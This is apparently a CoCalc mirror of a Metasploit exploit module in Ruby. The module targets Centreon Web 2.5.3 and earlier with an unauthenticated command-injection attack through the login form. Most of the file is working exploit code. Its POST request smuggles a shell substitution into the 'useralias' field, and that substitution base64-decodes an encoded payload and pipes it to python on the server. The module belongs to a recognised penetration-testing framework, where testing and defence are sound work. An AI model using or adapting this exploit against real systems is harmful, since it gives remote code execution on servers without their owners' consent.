Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/centreon_useralias_exec.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  include Msf::Exploit::Remote::HttpClient

8


9
  Rank = ExcellentRanking

10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Centreon Web Useralias Command Execution',

15
        'Description' => %q{

16
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL

17
          errors.  This functionality can be abused for arbitrary code

18
          execution, and can be triggered via the login screen prior to

19
          authentication.

20
        },

21
        'Author' => [

22
          'h00die <[email protected]>', # module

23
          'Nicolas CHATELAIN <[email protected]>' # discovery

24
        ],

25
        'References' => [

26
          [ 'EDB', '39501' ]

27
        ],

28
        'License' => MSF_LICENSE,

29
        'Platform' => ['python'],

30
        'Privileged' => false,

31
        'Arch' => ARCH_PYTHON,

32
        'Targets' => [

33
          [ 'Automatic Target', {}]

34
        ],

35
        'DefaultTarget' => 0,

36
        'DisclosureDate' => '2016-02-26',

37
        'Notes' => {

38
          'Reliability' => UNKNOWN_RELIABILITY,

39
          'Stability' => UNKNOWN_STABILITY,

40
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        Opt::RPORT(80),

48
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])

49
      ], self.class

50
    )

51
  end

52


53
  def check

54
    begin

55
      res = send_request_cgi(

56
        'uri' => normalize_uri(target_uri.path, 'index.php'),

57
        'method' => 'GET'

58
      )

59
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body

60


61
      if version && Rex::Version.new(version) <= Rex::Version.new('2.5.3')

62
        vprint_good("Version Detected: #{version}")

63
        Exploit::CheckCode::Appears

64
      else

65
        Exploit::CheckCode::Safe

66
      end

67
    rescue ::Rex::ConnectionError

68
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

69
    end

70
  end

71


72
  def exploit

73
    begin

74
      vprint_status('Sending malicious login')

75
      send_request_cgi(

76
        'uri' => normalize_uri(target_uri.path, 'index.php'),

77
        'method' => 'POST',

78
        'vars_post' =>

79
        {

80
          'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",

81
          'password' => Rex::Text.rand_text_alpha(5)

82
        }

83
      )

84
    rescue ::Rex::ConnectionError

85
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")

86
    end

87
  end

88
end

89


90